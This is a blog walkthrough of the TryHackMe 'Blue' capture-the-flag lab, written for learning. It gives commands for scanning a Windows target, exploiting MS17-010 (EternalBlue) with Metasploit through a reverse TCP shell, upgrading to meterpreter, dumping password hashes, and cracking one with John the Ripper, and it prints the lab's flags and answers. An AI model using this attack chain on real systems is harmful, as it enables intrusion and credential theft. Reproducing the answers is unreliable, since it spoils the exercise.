TryHackMe: Blue – Walkthrough

Hi! Welcome to this walkthrough on the TryHackMe: Blue room on TryHackMe. In this room we deploy & hack into a Windows machine, leveraging common misconfigurations issues. We will also get some practice with common tools such as NMap and Metasploit.

Room URL: https://tryhackme.com/room/blue

I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms. Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Task 1: Recon

Let’s get started with some recon!

Questions

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Let’s get started with some port scanning with nmap.

nmap -sV -sC --script vuln <target ip>

The -sV flag adds version detection, the -sC flag runs some default scripts, while the -script flag tries to find some vulnerabilities.

There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, SMB, and RPC. In addition we can see a vulnerability: smb-vuln-ms17–010, with CVE number CVE-2017–0143.

Answer: No answer needed

How many ports are open with a port number under 1000?

The first 3 port results have a number under 1000, so the answer is 3.

Answer: 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

Because of the –Sc flag we have run some basic scripts. One of them has discovered that the host is vulnerable to smb-vuln-ms17-010, or ms17-010 in short.

Answer: ms17–010

Task 2: Gain Access

Exploit the machine and gain a foothold.

Questions

Start Metasploit

Well, this is easy enough:

msfconsole

Answer: No answer needed

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Well, we know the name of the exploit, and we ware search for modules of the type exploit. So we can enter the following command:

search ms17–010 type:exploit

Considering the name of this room, I will go with the EternalBlue one.

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is very often RHOSTS, but let’s have a look. Load the module by entering use 0. Then enter show options.

And yes, RHOSTS is required. We normally set it to the target host ip. Do this by running:

set RHOSTS <target IP>

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

Set the payload (see above). We don’t always have to do this as Metasploit is usually smart enough to pick a payload.

With that done, run the exploit!

Simple type run or exploit.

Answer: No answer needed

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

We got access:

Background the shell by pressing Control+Z and move on to task 3.

Answer: No answer needed

Task 3: Escalate

Escalate privileges, learn how to upgrade shells in metasploit.

Questions

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I did a simple search for shell and found the following module:

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Activate the module by entering:

use post/multi/manage/shell_to_meterpreter

Follow this by running show options.

The answer is SESSION, which is required but not set.

Answer: SESSION

Set the required option, you may need to list all of the sessions to find your target here.

You can use sessions -l to see the id of the shell session. Proceed by setting the SESSION to 1 (set SESSION 1).

Answer: No answer needed

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Run the run command.

Enter the sessions -l command once more to see that we have a active Meterpreter session:

It is running on id 2.

Answer: No answer needed

Once the meterpreter shell conversion completes, select that session for use.

Change sessions by writing:

sessions -i 2

Answer: No answer needed

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Let’s run a shell and run whoami. We are indeed system.

Now background the shell by pressing Control+Z, and select the meterpreter session once more. This is likely still done by running sessions -i 2.

Answer: No answer needed

List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Run the ps command.

Pick a system process. I will remember select id 2728.

Answer: No answer needed

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Simply enter migrate 2728 (this might differ on your system).

Migration completed!

Answer: No answer needed

Task 4: Cracking

Dump the non-default user’s password and crack it!

Questions

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Now that we have our elevated shell, run hashdump.

In case you are wondering, the hashdump ouput follows the following format:

1. Username (Administrator, User1, etc.)
2. Relative Identification (RID)
3. LM hash
4. NTLM hash

The non-default user is Jon.

Answer: Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:

echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt

Let’s use John the Ripper to crack it. I first thought the format would be LM, but it is actually nt.

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the answer.

Answer: alqfna22

Task 5: Find flags!

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

Completed Blue? Check out Ice: Link

You can check out the third box in this series, Blaster, here: Link

Questions

Flag1? This flag can be found at the system root.

Make sure you are still in the meterpreter session. Check you present working directory by entering pwd. We are in the system32 folder inside Windows.

Move up twice by running .. twice.
List the files in the current directory (ls or dir) and finally read the flag by running cat flag1.txt.

Answer: flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

Windows password are stored hashed within files in the c:\Windows\System32\Config directory. Change your directory to  that directory in the meterpreter shell:

cd C:/Windows/System32/config

List the files there and you will find the second flag. Read the flag2.txt:

Answer: flag{sam_database_elevated_access}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I first thought I had to look into the C:/Users/Administrator folder but this does not exist. But on this system Jon is an administrator, so let’s look there.

If we list all files in the Jon directory we do not see any flag. Let’s go into the Documents folder. And bingo!

Answer: flag{admin_documents_can_be_valuable}

We are done!

We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I got walkthroughs for those as well!) it shouldn’t have been to difficult 🙂

See my walkthroughs here:

TryHackMe: Metasploit: Introduction  –  Walkthrough

TryHackMe: Metasploit: Exploitation - Walkthrough

TryHackMe: Metasploit Meterpreter – Walkthrough

I hope you got some benefit from this walkthrough.

Like my articles?

You are welcome to comment on this article, and please share with friends 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

https://referral.hackthebox.com/mzwwXlg